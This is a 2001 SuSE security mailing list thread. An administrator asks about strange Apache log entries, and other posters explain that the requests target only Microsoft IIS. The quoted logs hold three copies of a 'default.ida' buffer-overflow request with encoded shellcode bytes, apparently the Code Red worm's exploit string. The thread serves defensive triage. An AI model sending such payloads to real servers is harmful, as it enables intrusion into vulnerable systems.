Mailinglist Archive: opensuse-security (343 mails)

< Previous Next >
RE: [suse-security] Strange HTTP requests
  • From: "Lars Schlimpert" <lars@xxxxxxx>
  • Date: Fri, 20 Jul 2001 08:48:12 +0200
  • Message-id: <FKEKKGIOHBKCFHPELNFGAEGACNAA.lars@xxxxxxx>
i have this default.ida requests too!
but we running apache and roxen server only.
what for stupid guys try this IIS exploid on apache or roxen? *rofl*

tia, lars s.

> -----Original Message-----
> From: dog@xxxxxxxxx [mailto:dog@xxxxxxxxx]
> Sent: Friday, July 20, 2001 6:08 AM
> To: michael.ryan@xxxxxxxx
> Cc: suse-security@xxxxxxxx
> Subject: Re: [suse-security] Strange HTTP requests
>
>
> this only affects microsoft internet information server (iis) you have
> nothing to worry about if you are only running apache.
>
> On Thu, 19 Jul 2001 michael.ryan@xxxxxxxx wrote:
>
> >
> >
> >... on the same thread ... are there any known
> exploits/vulnerabilities for
> >Apache 1.3.12 running on SuSE?
> >(The only issue I found on
> >http://www.suse.com/us/support/security/index.html was dated
> 07-09-2000 and
> >just required a minor edit to httpd.conf)
> >should I upgrade to 1.3.19 anyway?
> >
> >TIA
> >Michael
> >
> >
> >
> >
> > Lars Trebing
> > <ltrebing@ltr To: SuSE Security
> Mailing List <suse-security@xxxxxxxx>
> > ebing.de> cc:
> > Subject:
> [suse-security] Strange HTTP requests
> > 07/19/2001
> > 07:46 PM
> >
> >
> >
> >
> >
> >
> >Hello everyone,
> >
> >My Apache has just got three strange requests from three different
> >addresses:
> >
> >63.149.209.133 - - [19/Jul/2001:18:55:47 +0200] "GET
> >/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%
> u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%
> u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> >
> >HTTP/1.0" 400 315
> >209.215.117.8 - - [19/Jul/2001:19:14:28 +0200] "GET
> >/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%
> u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%
> u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> >
> >HTTP/1.0" 400 315
> >161.184.88.254 - - [19/Jul/2001:19:21:18 +0200] "GET
> >/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%
> u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%
> u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> >
> >HTTP/1.0" 400 315
> >
> >Might this perhaps be an attack for a known bug of some HTTP server?
> >Should I maybe even worry about this? (I am running Apache 1.3.12).
> >
> >By the way, I performed the same request locally and got a 404 error
> >instead of the 400s reported in the log.
> >
> >TIA, Lars
> >
> >--
> >To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
> >For additional commands, e-mail: suse-security-help@xxxxxxxx
> >
> >
> >
> >
> >
> >--
> >To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
> >For additional commands, e-mail: suse-security-help@xxxxxxxx
> >
>
> Chad Whitten
> Network/Systems Administrator
> Nexband Communications
> chadwick@xxxxxxxxxxx
>
>
> --
> To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
> For additional commands, e-mail: suse-security-help@xxxxxxxx
>


< Previous Next >
References